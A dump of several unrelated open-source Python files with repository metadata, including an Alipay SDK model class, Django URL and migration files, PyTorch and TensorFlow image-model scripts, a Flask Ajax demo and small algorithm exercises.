Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 2,270 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class OssDirectoryDetail(object):
def __init__(self):
self._acl = None
self._file_id = None
self._file_name = None
self._last_modified = None
@property
def acl(self):
return self._acl
@acl.setter
def acl(self, value):
self._acl = value
@property
def file_id(self):
return self._file_id
@file_id.setter
def file_id(self, value):
self._file_id = value
@property
def file_name(self):
return self._file_name
@file_name.setter
def file_name(self, value):
self._file_name = value
@property
def last_modified(self):
return self._last_modified
@last_modified.setter
def last_modified(self, value):
self._last_modified = value
def to_alipay_dict(self):
params = dict()
if self.acl:
if hasattr(self.acl, 'to_alipay_dict'):
params['acl'] = self.acl.to_alipay_dict()
else:
params['acl'] = self.acl
if self.file_id:
if hasattr(self.file_id, 'to_alipay_dict'):
params['file_id'] = self.file_id.to_alipay_dict()
else:
params['file_id'] = self.file_id
if self.file_name:
if hasattr(self.file_name, 'to_alipay_dict'):
params['file_name'] = self.file_name.to_alipay_dict()
else:
params['file_name'] = self.file_name
if self.last_modified:
if hasattr(self.last_modified, 'to_alipay_dict'):
params['last_modified'] = self.last_modified.to_alipay_dict()
else:
params['last_modified'] = self.last_modified
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = OssDirectoryDetail()
if 'acl' in d:
o.acl = d['acl']
if 'file_id' in d:
o.file_id = d['file_id']
if 'file_name' in d:
o.file_name = d['file_name']
if 'last_modified' in d:
o.last_modified = d['last_modified']
return o
|
[
"[email protected]"
] | |
dfc0cc855a774de8fa89bf5d0af2e7761c1399da
|
cf0ab8503d4d704045070deea1e2125375711e86
|
/apps/apikeys/v1/urls.py
|
1a8b15c264dc105260d2432da2775b98a3fb3a99
|
[] |
no_license
|
faierbol/syncano-platform
|
c3c6468600115752fd9fa5e46a0ad59f75f6bc9c
|
879111874d1ef70418b4890cf970720b0a2be4d8
|
refs/heads/master
| 2023-07-20T10:13:40.066127 | 2021-02-08T15:01:13 | 2021-02-08T15:01:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 198 |
py
|
# coding=UTF8
from rest_framework.routers import SimpleRouter
from apps.apikeys.v1 import views
router = SimpleRouter()
router.register('api_keys', views.ApiKeyViewSet)
urlpatterns = router.urls
|
[
"[email protected]"
] | |
42bdb6a885ac58d51bad36beea8877307f7902a5
|
eda9187adfd53c03f55207ad05d09d2d118baa4f
|
/algo/Transfer_Learning/Transfer_learning.py
|
725a6e82bceb8aa1d09e9cb263fc2fdf9da6aea1
|
[] |
no_license
|
HuiZhaozh/python_tutorials
|
168761c9d21ad127a604512d7c6c6b38b4faa3c7
|
bde4245741081656875bcba2e4e4fcb6b711a3d9
|
refs/heads/master
| 2023-07-07T20:36:20.137647 | 2020-04-24T07:18:25 | 2020-04-24T07:18:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,586 |
py
|
# -*- coding:utf-8 -*-
# /usr/bin/python
'''
-------------------------------------------------
File Name : Transfer_learning
   Description   :  Transfer learning
Envs : pytorch
Author : yanerrol
Date : 2020/2/17 09:58
-------------------------------------------------
Change Activity:
2020/2/17 : new
-------------------------------------------------
'''
__author__ = 'yanerrol'
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import datasets
from torchvision import transforms
from torch.utils.data import DataLoader
#######################################
### PRE-TRAINED MODELS AVAILABLE HERE
## https://pytorch.org/docs/stable/torchvision/models.html
from torchvision import models
#######################################
if torch.cuda.is_available():
torch.backends.cudnn.deterministic = True
##########################
### SETTINGS
##########################
# Device
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print('Device:', DEVICE)
NUM_CLASSES = 10
# Hyperparameters
random_seed = 1
learning_rate = 0.0001
num_epochs = 10
batch_size = 128
##########################
### MNIST DATASET
##########################
custom_transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
])
## Note that this particular normalization scheme is
## necessary since it was used for pre-training
## the network on ImageNet.
## These are the channel-means and standard deviations
## for z-score normalization.
train_dataset = datasets.CIFAR10(root='data',
train=True,
transform=custom_transform,
download=True)
test_dataset = datasets.CIFAR10(root='data',
train=False,
transform=custom_transform)
train_loader = DataLoader(dataset=train_dataset,
batch_size=batch_size,
num_workers=8,
shuffle=True)
test_loader = DataLoader(dataset=test_dataset,
batch_size=batch_size,
num_workers=8,
shuffle=False)
# Checking the dataset
for images, labels in train_loader:
print('Image batch dimensions:', images.shape)
print('Image label dimensions:', labels.shape)
break
##########################
### Loading Pre-Trained Model
##########################
model = models.vgg16(pretrained=True)
##########################
### Freezing Model
##########################
for param in model.parameters():
param.requires_grad = False
# note: requires_grad must be set on the parameters, not on the module object
for param in model.classifier[3].parameters():
    param.requires_grad = True
model.classifier[6] = nn.Sequential(
nn.Linear(4096, 512),
nn.ReLU(),
nn.Dropout(0.5),
nn.Linear(512, NUM_CLASSES))
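# Quick sanity check (editor's sketch, not in the original file): after the
# freezing above, only classifier[3] and the new classifier[6] head should
# still receive gradients.
num_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('Trainable parameter count:', num_trainable)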
##########################
### Training as usual
##########################
model = model.to(DEVICE)
optimizer = torch.optim.Adam(model.parameters())
def compute_accuracy(model, data_loader):
model.eval()
correct_pred, num_examples = 0, 0
for i, (features, targets) in enumerate(data_loader):
features = features.to(DEVICE)
targets = targets.to(DEVICE)
logits = model(features)
_, predicted_labels = torch.max(logits, 1)
num_examples += targets.size(0)
correct_pred += (predicted_labels == targets).sum()
return correct_pred.float() / num_examples * 100
def compute_epoch_loss(model, data_loader):
model.eval()
curr_loss, num_examples = 0., 0
with torch.no_grad():
for features, targets in data_loader:
features = features.to(DEVICE)
targets = targets.to(DEVICE)
logits = model(features)
loss = F.cross_entropy(logits, targets, reduction='sum')
num_examples += targets.size(0)
curr_loss += loss
curr_loss = curr_loss / num_examples
return curr_loss
start_time = time.time()
for epoch in range(num_epochs):
model.train()
for batch_idx, (features, targets) in enumerate(train_loader):
features = features.to(DEVICE)
targets = targets.to(DEVICE)
### FORWARD AND BACK PROP
logits = model(features)
cost = F.cross_entropy(logits, targets)
optimizer.zero_grad()
cost.backward()
### UPDATE MODEL PARAMETERS
optimizer.step()
### LOGGING
if not batch_idx % 50:
print('Epoch: %03d/%03d | Batch %04d/%04d | Cost: %.4f'
% (epoch + 1, num_epochs, batch_idx,
len(train_loader), cost))
model.eval()
with torch.set_grad_enabled(False): # save memory during inference
print('Epoch: %03d/%03d | Train: %.3f%% | Loss: %.3f' % (
epoch + 1, num_epochs,
compute_accuracy(model, train_loader),
compute_epoch_loss(model, train_loader)))
print('Time elapsed: %.2f min' % ((time.time() - start_time) / 60))
print('Total Training Time: %.2f min' % ((time.time() - start_time) / 60))
with torch.set_grad_enabled(False): # save memory during inference
    print('Test accuracy: %.2f%%' % (compute_accuracy(model, test_loader)))
##########################
### Visualizing predictions
##########################
import matplotlib.pyplot as plt
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
for batch_idx, (features, targets) in enumerate(test_loader):
features = features
targets = targets
break
logits = model(features.to(DEVICE))
_, predicted_labels = torch.max(logits, 1)
def unnormalize(tensor, mean, std):
for t, m, s in zip(tensor, mean, std):
t.mul_(s).add_(m)
return tensor
n_images = 10
fig, axes = plt.subplots(nrows=1, ncols=n_images,
sharex=True, sharey=True, figsize=(20, 2.5))
orig_images = features[:n_images]
for i in range(n_images):
curr_img = orig_images[i].detach().to(torch.device('cpu'))
curr_img = unnormalize(curr_img,
torch.tensor([0.485, 0.456, 0.406]),
torch.tensor([0.229, 0.224, 0.225]))
curr_img = curr_img.permute((1, 2, 0))
axes[i].imshow(curr_img)
axes[i].set_title(classes[predicted_labels[i]])
|
[
"[email protected]"
] | |
57bfefceefd25252047dcd608dff497f0c347b82
|
988dd821269be12c2f56f62b0c35546fd3050537
|
/python/quaternions/rotations.py
|
852c8839c1435519fcbc0675bd055c4d8af732b7
|
[] |
no_license
|
gdiazh/adcs_models
|
fb19f541eeb9b01ae49ec98719c508d084e4fd7a
|
51d0829cc777d2e345e4fabe406ec7f54e661117
|
refs/heads/master
| 2020-03-28T13:04:56.174852 | 2018-09-28T22:08:25 | 2018-09-28T22:08:25 | 148,364,081 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,050 |
py
|
#!/usr/bin/python
__author__ = 'gdiaz'
import matplotlib as mpl
from plotVectors import PlotVectors
import numpy as np
class Rotation(object):
def __init__(self):
self.vectors = PlotVectors()
self.a = [0, 0, 0]
def rotate_z(self, a, yaw):
Az = np.matrix([[np.cos(yaw), -np.sin(yaw), 0],
[np.sin(yaw), np.cos(yaw), 0],
[0, 0, 1]])
a_ = np.matrix([[a[0]],
[a[1]],
[a[2]]])
u = Az*a_
return [u.item(0), u.item(1), u.item(2)]
def rotate_frame_z(self, I, J, K, yaw):
Az = np.matrix([[np.cos(yaw), np.sin(yaw), 0],
[-np.sin(yaw), np.cos(yaw), 0],
[0, 0, 1]])
I_ = np.matrix([I[0], I[1], I[2]])
J_ = np.matrix([J[0], J[1], J[2]])
K_ = np.matrix([K[0], K[1], K[2]])
i_ = I_*Az
j_ = J_*Az
k_ = K_*Az
i = [i_.item(0), i_.item(1), i_.item(2)]
j = [j_.item(0), j_.item(1), j_.item(2)]
k = [k_.item(0), k_.item(1), k_.item(2)]
return [i, j, k]
def vectorRotationTest(self):
# Calcs
p1 = [2, 0, 0]
yaw = 90*np.pi/180
p1_rot = self.rotate_z(p1, yaw)
print p1_rot
# Plot
self.vectors.plotAxes()
self.vectors.config()
self.vectors.plot(p1)
self.vectors.plot(p1_rot)
self.vectors.show()
def frameRotationTest(self):
# Calcs
I = [1, 0, 0]
J = [0, 1, 0]
K = [0, 0, 1]
yaw = 45*np.pi/180
ijk = self.rotate_frame_z(I, J, K, yaw)
print ijk
# Plot
self.vectors.plotAxes()
self.vectors.config()
self.vectors.plot(ijk[0])
self.vectors.plot(ijk[1])
self.vectors.plot(ijk[2])
self.vectors.show()
def get_qT(self, yawT): #Return quaternion target given yaw target
AT = np.matrix([[np.cos(yawT), np.sin(yawT), 0],
[-np.sin(yawT), np.cos(yawT), 0],
[0, 0, 1]])
q4 = 0.5*np.sqrt(1+AT[0,0]+AT[1,1]+AT[2,2])
q1 = 0.25*(AT[1,2]-AT[2,1])/q4
q2 = 0.25*(AT[2,0]-AT[0,2])/q4
q3 = 0.25*(AT[0,1]-AT[1,0])/q4
return [q4, q1, q2, q3]
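    # e.g. yawT = 0 gives the identity DCM, hence [q4, q1, q2, q3] = [1, 0, 0, 0]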
def get_qE_(self, qT, qS):
qT_ = np.matrix([[qT[0], qT[3], -qT[2], qT[1]],
[-qT[3], qT[0], qT[1], qT[2]],
[qT[2], -qT[1], qT[0], qT[3]],
[-qT[1], -qT[2], -qT[3], qT[0]]])
qS_ = np.matrix([[-qS[1]],
[-qS[2]],
[-qS[3]],
[qS[0]]])
qE = qT_*qS_
return [qE.item(0), qE.item(1), qE.item(2), qE.item(3)]
def get_qE(self, yawT, qS):
qT = self.get_qT(yawT)
qE = self.get_qE_(qT, qS)
return qE
if __name__ == '__main__':
rotation = Rotation()
# Test Example
# rotation.vectorRotationTest()
rotation.frameRotationTest()
|
[
"[email protected]"
] | |
f281fed287dbd357fea0ab3bb3bd35efc0794cf4
|
51d65cbed3df1e9e3a0d51f79590ee12f88291d1
|
/object_detection/inference_over_image.py
|
0bbbdb9954ca69ffd0cf92de7a7cbb7577cf8043
|
[
"MIT"
] |
permissive
|
apacha/Mensural-Detector
|
f9332c23854263c6a3f89e8b92f3f666f8377ed8
|
05c91204cf268feaae84cd079dbe7a1852fba216
|
refs/heads/master
| 2022-09-23T21:20:53.376367 | 2022-08-31T08:36:35 | 2022-08-31T08:36:35 | 137,372,669 | 12 | 6 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,444 |
py
|
import numpy as np
import tensorflow as tf
import argparse
from PIL import Image
from object_detection.utils import ops as utils_ops, label_map_util, visualization_utils as vis_util
if tf.__version__ < '1.4.0':
raise ImportError('Please upgrade your tensorflow installation to v1.4.* or later!')
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
def run_inference_for_single_image(image, graph):
with graph.as_default():
with tf.Session() as sess:
# Get handles to input and output tensors
ops = tf.get_default_graph().get_operations()
all_tensor_names = {output.name for op in ops for output in op.outputs}
tensor_dict = {}
for key in [
'num_detections', 'detection_boxes', 'detection_scores',
'detection_classes', 'detection_masks'
]:
tensor_name = key + ':0'
if tensor_name in all_tensor_names:
tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(tensor_name)
if 'detection_masks' in tensor_dict:
# The following processing is only for single image
detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])
detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])
# Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.
real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)
detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])
detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
detection_masks, detection_boxes, image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(tf.greater(detection_masks_reframed, 0.5), tf.uint8)
# Follow the convention by adding back the batch dimension
tensor_dict['detection_masks'] = tf.expand_dims(detection_masks_reframed, 0)
image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')
# Run inference
output_dict = sess.run(tensor_dict, feed_dict={image_tensor: np.expand_dims(image, 0)})
# all outputs are float32 numpy arrays, so convert types as appropriate
output_dict['num_detections'] = int(output_dict['num_detections'][0])
output_dict['detection_classes'] = output_dict['detection_classes'][0].astype(np.uint8)
output_dict['detection_boxes'] = output_dict['detection_boxes'][0]
output_dict['detection_scores'] = output_dict['detection_scores'][0]
if 'detection_masks' in output_dict:
output_dict['detection_masks'] = output_dict['detection_masks'][0]
return output_dict
def load_detection_graph(path_to_checkpoint):
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(path_to_checkpoint, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return detection_graph
def load_category_index(path_to_labels, number_of_classes):
# Load label map
label_map = label_map_util.load_labelmap(path_to_labels)
categories = label_map_util.convert_label_map_to_categories(label_map,
max_num_classes=number_of_classes,
use_display_name=True)
category_index = label_map_util.create_category_index(categories)
return category_index
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Performs detection over input image given a trained detector.')
parser.add_argument('--inference_graph', dest='inference_graph', type=str, required=True,
help='Path to the frozen inference graph.')
parser.add_argument('--label_map', dest='label_map', type=str, required=True,
                        help='Path to the label map, a json file that maps each category name to a unique number.',
default="mapping.txt")
parser.add_argument('--number_of_classes', dest='number_of_classes', type=int, default=32,
help='Number of classes.')
parser.add_argument('--input_image', dest='input_image', type=str, required=True, help='Path to the input image.')
parser.add_argument('--output_image', dest='output_image', type=str, default='detection.jpg',
help='Path to the output image.')
args = parser.parse_args()
# Path to frozen detection graph. This is the actual model that is used for the object detection.
# PATH_TO_CKPT = '/home/jcalvo/Escritorio/Current/Mensural Detector/mensural-detector/output_inference_graph.pb/frozen_inference_graph.pb'
path_to_frozen_inference_graph = args.inference_graph
path_to_labels = args.label_map
number_of_classes = args.number_of_classes
input_image = args.input_image
output_image = args.output_image
# Read frozen graph
detection_graph = load_detection_graph(path_to_frozen_inference_graph)
category_index = load_category_index(path_to_labels, number_of_classes)
image = Image.open(input_image)
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
image_np = load_image_into_numpy_array(image)
# Actual detection.
output_dict = run_inference_for_single_image(image_np, detection_graph)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks'),
use_normalized_coordinates=True,
line_thickness=2)
Image.fromarray(image_np).save(output_image)
|
[
"[email protected]"
] | |
524db47926d6c1b18a65735cec61aad5f9e91b97
|
d2c163f246d28b8519f8c89de23556e43be91684
|
/www/ad_board/urls.py
|
9309b9dfb201f43c13a2ec3d393148de00aea612
|
[] |
no_license
|
boogiiieee/Iskcon
|
d7a2b8bdc3002ef3306fc5e7ddc577504d8533c9
|
b672dbafee06af3ee6d646c75f442d97133f5ec9
|
refs/heads/master
| 2021-09-04T03:11:06.770094 | 2018-01-15T04:21:36 | 2018-01-15T04:21:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 388 |
py
|
# -*- coding: utf-8 -*-
from django.conf.urls.defaults import patterns, include, url
urlpatterns = patterns('ad_board.views',
url(r'^$', 'full', name='ad_board_url'),
url(r'^category/(?P<id>[0-9]+)/$', 'category', name='category_ad_board_url'),
url(r'^(?P<id>[0-9]+)/$', 'item', name='ad_board_item_url'),
url(r'^category/(?P<id>[0-9]+)/add/$', 'add', name='add_ad_board_url'),
)
|
[
"[email protected]"
] | |
198442838c9414d3f62f9b0af071a325589a66ae
|
8840b69e4341f4ed030c8b33151db205b8db3640
|
/flask_minijax.py
|
a5036e1c916ae910ed2af7e28ecdc01b86534110
|
[
"MIT"
] |
permissive
|
FidgetYou/proj3-anagrams
|
b5fe7ccc333bca0895c12590142b9f0e30f10b83
|
86923a696794b7098940023d57aaef679a52b3ac
|
refs/heads/master
| 2021-01-11T01:03:32.507679 | 2016-10-18T01:58:25 | 2016-10-18T01:58:25 | 70,846,302 | 0 | 0 | null | 2016-10-13T20:39:51 | 2016-10-13T20:39:50 | null |
UTF-8
|
Python
| false | false | 1,317 |
py
|
"""
Tiny demo of Ajax interaction
"""
import flask
from flask import request # Data from a submitted form
from flask import url_for
from flask import jsonify # For AJAX transactions
import json
import logging
import argparse # For the vocabulary list
import sys
###
# Globals
###
app = flask.Flask(__name__)
import CONFIG
app.secret_key = CONFIG.secret_key # Should allow using session variables
###
# Pages
###
@app.route("/")
def index():
return flask.render_template('minijax.html')
###############
# AJAX request handlers
# These return JSON to the JavaScript function on
# an existing page, rather than rendering a new page.
###############
@app.route("/_countem")
def countem():
text = request.args.get("text", type=str)
length = len(text)
rslt = { "long_enough": length >= 5 }
return jsonify(result=rslt)
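# e.g. the page's JavaScript might issue  GET /_countem?text=hello
# and receive  {"result": {"long_enough": true}}  since len("hello") >= 5.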
#############
# Run locally
if __name__ == "__main__":
# Standalone.
app.debug = True
app.logger.setLevel(logging.DEBUG)
print("Opening for global access on port {}".format(CONFIG.PORT))
app.run(port=CONFIG.PORT, host="0.0.0.0")
# If we run 'python3 flask_minijax.py', we get the above 'main'.
# If we run 'gunicorn flask_minijax:app', we instead get a
# 'main' inside gunicorn, which loads this file as a module
# and accesses the Flask 'app' object.
#
|
[
"[email protected]"
] | |
6d346848a2eed9d5be67fdb017a17285227f874a
|
bd5a3b59a5ca9f0c0394c8bf90e818c3967778d9
|
/vre/apps/xauth/urls.py
|
2ba5dfc62bf27aafa163e3cf36365c4b0ea01be0
|
[] |
no_license
|
BlickLabs/vre
|
85f377c04406c163464f7ddade7eafb579f1dfb1
|
6f3644fb9295f6355057cfa64a1156a329b4b4b8
|
refs/heads/develop
| 2020-05-22T04:28:31.913667 | 2018-07-06T21:12:14 | 2018-07-06T21:12:14 | 62,763,239 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 297 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf.urls import url
from . import views
urlpatterns = [
url(regex=r'^login/$',
view=views.LoginView.as_view(),
name='login'),
url(regex=r'^logout/$',
view=views.logout_view,
name='logout'),
]
|
[
"[email protected]"
] | |
de57cedbc86dec255b93ebc77daf153a873f5256
|
1422a57e98aba02321b772d72f8f0ada6d8b8cba
|
/friday/friday-vendor/vendor-scripts/test-resources/scripts/pylib/hue_turn_on_light.py
|
152b15f1a6ee7c7306946bab089ea4f1578d9421
|
[
"MIT"
] |
permissive
|
JonasRSV/Friday
|
e1908a411aa133bc5bd2f383b0a995f7e028092d
|
f959eff95ba7b11525f97099c8f5ea0e325face7
|
refs/heads/main
| 2023-05-15T03:33:21.542621 | 2021-06-12T10:34:50 | 2021-06-12T10:34:50 | 315,309,991 | 7 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 196 |
py
|
import phue
import sys
if __name__ == "__main__":
b = phue.Bridge(config_file_path="credentials.json")
b.set_light(int(sys.argv[1]), parameter={"on": True, "bri": 200}, transitiontime=5)
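# Note: sys.argv[1] is the numeric light id; Hue transition times are given
# in 100 ms steps, so transitiontime=5 is roughly half a second.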
|
[
"[email protected]"
] | |
c43501f1134f44d9e0c3c38a8ce719ea17e5bbcb
|
3253da5603971958d69df0ed442e3341a8d3bff4
|
/1-Iniciante/1914.py
|
67fa34c039b20ad33bd528808a4ce2d4016000af
|
[] |
no_license
|
CleitonSilvaT/URI_Python
|
1c73ec0852ae87c6138baa148ad8c2cb56bb723e
|
a8510bab2fa8f680b54058fafebff3a2727617d9
|
refs/heads/master
| 2021-06-20T08:18:50.104839 | 2021-05-20T08:59:19 | 2021-05-20T08:59:19 | 213,665,657 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 959 |
py
|
# -*- coding: utf-8 -*-
if __name__ == '__main__':
    # Input: number of test cases
casos_teste = int(input())
while(casos_teste > 0):
        # Input: players and their parity choices
dados = input()
escolha = dados.split(' ')
        # name of player 1   - escolha[0]
        # choice of player 1 - escolha[1]
        # name of player 2   - escolha[2]
        # choice of player 2 - escolha[3]
        # Input: the two numbers played
valores = input()
numeros = valores.split(' ')
        # Compute the sum of the two values
total = int(numeros[0]) + int(numeros[1])
        # Determine whether the sum is even (PAR) or odd (IMPAR)
if((total % 2) == 0):
            # Print the winner
if(escolha[1] == 'PAR'):
print(escolha[0])
else:
print(escolha[2])
else:
            # Print the winner
if(escolha[1] == 'IMPAR'):
print(escolha[0])
else:
print(escolha[2])
casos_teste -= 1
|
[
"[email protected]"
] | |
b672c87e3458490ceb0e8b3852355a8c15a2c399
|
d1fadc514274711a7986a6b3caaaee7e8d48b4a6
|
/plot_scripts/scratch29.py
|
9b454212d7485e7e1237f495490e6b1a3e2c0169
|
[
"MIT"
] |
permissive
|
lbaiao/sys-simulator-2
|
24d940db6423070818c23b6ffefbc5da4a1030a0
|
94f00d43309fe7b56dac5099bd4024695ba317b6
|
refs/heads/master
| 2021-08-20T08:30:06.864473 | 2021-06-30T10:37:26 | 2021-06-30T10:37:26 | 230,333,523 | 1 | 0 | null | 2021-06-30T10:37:27 | 2019-12-26T22:02:59 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,688 |
py
|
import pickle
import matplotlib.pyplot as plt
import numpy as np
filepath = 'D:/Dev/sys-simulator-2/data/scratch29.pickle'
file = open(filepath, 'rb')
data = pickle.load(file)
aux_range = [10,15,20]
action_counts_total = data['action_counts_total']
d2d_spectral_effs = data['d2d_speffs_avg_total']
mue_success_rate = data['mue_success_rate']
equals_counts_total = data['equals_counts_total']
d2d_speffs_avg = list()
for i, d in enumerate(d2d_spectral_effs):
d2d_speffs_avg.append(np.average(d))
fig2, ax1 = plt.subplots()
ax1.set_xlabel('Number of D2D pairs in the RB')
ax1.set_ylabel('D2D Average Spectral Efficiency [bps/Hz]', color='tab:blue')
ax1.plot(d2d_speffs_avg, '.', color='tab:blue')
ax2 = ax1.twinx()
ax2.set_ylabel('MUE Success Rate', color='tab:red')
ax2.plot(mue_success_rate, '.', color='tab:red')
fig2.tight_layout()
xi = list(range(len(aux_range)))
ax = [0,1,2,3,4]
axi = list(range(len(ax)))
for i, c in enumerate(action_counts_total):
if i in aux_range:
plt.figure()
plt.plot(np.mean(c, axis=0)/i*100, '*',label='mean')
plt.plot(np.std(c, axis=0)/i*100, 'x', label='std')
plt.legend()
plt.title(f'N={i}')
plt.xlabel('Action Index')
plt.ylabel('Average Action Ocurrency [%]')
plt.xticks(axi, ax)
mean_equals = np.array([np.mean(c) for c in equals_counts_total])
std_equals = np.array([np.std(c) for c in equals_counts_total])
plt.figure()
plt.plot(mean_equals[aux_range]*100, '*',label='mean')
plt.plot(std_equals[aux_range]*100, 'x', label='std')
plt.legend()
plt.xlabel('Amount of D2D Devices')
plt.ylabel('Average Equal Actions Ocurrency [%]')
plt.xticks(xi, aux_range)
plt.show()
|
[
"[email protected]"
] | |
6e412c2830f0c0210c5542502eff73dfa2776a76
|
1b78ca7f3250ebed418717c6ea28b5a77367f1b8
|
/411.minimum-unique-word-abbreviation/minimum-unique-word-abbreviation.py
|
70887cecba089f780017d17a96ca6739c187979c
|
[] |
no_license
|
JaniceLC/lc-all-solutions
|
ced854f31b94f44c0b03a0677988805e3b9ee718
|
3f2a4ee8c09a8890423c6a22c73f470eccf979a2
|
refs/heads/master
| 2020-04-05T19:53:31.307528 | 2018-11-12T04:18:45 | 2018-11-12T04:18:45 | 157,155,285 | 0 | 2 | null | 2018-11-12T04:13:22 | 2018-11-12T04:13:22 | null |
UTF-8
|
Python
| false | false | 1,290 |
py
|
class Solution(object):
def minAbbreviation(self, target, dictionary):
"""
:type target: str
:type dictionary: List[str]
:rtype: str
"""
def dfs(w, start, res):
res.append(w)
for i in xrange(start, len(w)):
for l in reversed(xrange(1, len(w) - i + 1)):
dfs(w[:i] + [str(l)] + w[i+l:], i + 2, res)
def match(src, dest):
i = 0
for c in src:
if c.isdigit():
jump = int(c)
i += jump
else:
if c != dest[i]:
return False
i += 1
return True
if not dictionary:
return str(len(target))
wordLen = len(target)
res = []
dfs(list(target), 0, res)
res.sort(key=lambda x:len(x))
dictionary = filter(lambda s: len(s) == wordLen, dictionary)
for w in res:
allMiss = True
for d in dictionary:
if match(w, d):
allMiss = False
break
if allMiss:
return "".join(w)
return None
|
[
"[email protected]"
] | |
8cf1337f8036de2054ba11a4c1ef5921ff9e2863
|
641f76328bfeb7e54f0793a18c5b7c00595b98fd
|
/apps/goods/migrations/0015_auto_20181019_1007.py
|
a9bf43d5073534905d8a89c4b1ee68ce1ac10451
|
[
"Apache-2.0"
] |
permissive
|
lianxiaopang/camel-store-api
|
1d16060af92eb01607757c0423377a8c94c3a726
|
b8021250bf3d8cf7adc566deebdba55225148316
|
refs/heads/master
| 2020-12-29T13:23:18.118617 | 2020-02-09T08:38:53 | 2020-02-09T08:38:53 | 238,621,246 | 0 | 0 |
Apache-2.0
| 2020-02-07T14:28:35 | 2020-02-06T06:17:47 |
Python
|
UTF-8
|
Python
| false | false | 1,439 |
py
|
# Generated by Django 2.1.2 on 2018-10-19 02:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('goods', '0014_auto_20181011_1646'),
]
operations = [
migrations.AlterModelOptions(
name='goodscategory',
options={'ordering': ('index', '-is_active'), 'verbose_name': '商品类别', 'verbose_name_plural': '商品类别'},
),
migrations.AlterModelOptions(
name='goodtype',
options={'ordering': ('index',), 'verbose_name': '商品规格', 'verbose_name_plural': '商品规格'},
),
migrations.AddField(
model_name='goodscategory',
name='index',
field=models.PositiveSmallIntegerField(default=0, verbose_name='优先级'),
),
migrations.AddField(
model_name='goodscategory',
name='is_active',
field=models.BooleanField(default=True, verbose_name='是否启用'),
),
migrations.AddField(
model_name='goodtype',
name='asset_ratio',
field=models.PositiveSmallIntegerField(default=0, help_text='单位:%', verbose_name='返利比例'),
),
migrations.AddField(
model_name='goodtype',
name='index',
field=models.PositiveSmallIntegerField(default=0, verbose_name='优先级'),
),
]
|
[
"[email protected]"
] | |
d01b1468d7aaf781d587e8b861611e92d26f28dd
|
e8f99a162207cba82d4e0f969d7bcdb2b9d8b522
|
/imooc/python3_shizhan/ten/c1.py
|
6a78a3e875eb35796ea35e07c606f9f44d0ef637
|
[] |
no_license
|
TesterCC/Python3Scripts
|
edb5446278ebf13edb64336001081941ca27d67d
|
58be67e1ffc74ef50289a885aa4ad05f58e2c383
|
refs/heads/master
| 2023-08-30T21:16:38.328045 | 2023-08-17T11:23:08 | 2023-08-17T11:23:08 | 93,401,996 | 6 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 721 |
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'MFC'
__time__ = '18/5/2 21:48'
"""
Chapter 10: Regular expressions and JSON
Regular expressions
JSON, XML
A regular expression is a special sequence of characters that tests whether a string matches the pattern we define.
It lets us search text quickly and perform replacement operations, for example:
1. Check whether a string of digits is a phone number
2. Check whether a string is a well-formed email address
3. Replace a given word in a text with another word
If you are fluent with regex, you can do without many built-in string methods.
"""
a = 'C|C++|Java|C#|Python|Javascript'
# built-in string operations used to check whether the string contains 'Python'
print(a.index('Python'))
print(a.index('Python') > -1)
print('Python' in a)
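# A minimal regex sketch of the three uses listed above (the patterns are
# illustrative assumptions, not production-grade validators):
import re
print(re.match(r'^1[3-9]\d{9}$', '13812345678') is not None)   # 1. phone-number check
print(re.match(r'^[\w.+-]+@[\w-]+\.[\w.-]+$', 'user@example.com') is not None)  # 2. email check
print(re.sub(r'\bJava\b', 'Go', a))  # 3. replace a word ('Java' -> 'Go', leaving 'Javascript' intact)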
|
[
"[email protected]"
] | |
197926393868d21e6ae154a9dd519b9c67bbad9c
|
cd014fae6791f51a9a382f34dbdcee6d61d84e30
|
/64_eqf_fveqf_fvf_fvegf/64.py
